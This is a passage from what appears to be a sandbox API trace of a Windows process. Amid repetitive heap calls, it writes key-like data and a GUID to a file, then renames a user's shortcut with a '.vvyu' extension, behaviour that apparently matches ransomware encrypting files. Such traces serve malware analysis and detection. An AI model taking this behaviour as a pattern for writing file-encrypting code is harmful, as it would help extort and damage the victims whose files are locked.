dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0194.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0194.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0194.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0194.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.854] WriteFile (in: hFile=0x584, lpBuffer=0x3b48b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48b8*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0194.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0194.855] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.855] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0194.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0194.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0194.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.857] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.858] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.858] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.858] CloseHandle (hObject=0x584) returned 1 [0194.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0194.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0194.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0194.860] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Spaces.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live spaces.url.vvyu")) returned 1 [0194.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.861] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0194.863] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 0 [0194.863] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0194.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0194.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0194.864] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0194.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0194.865] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0194.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0194.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0194.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0194.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0194.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0194.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 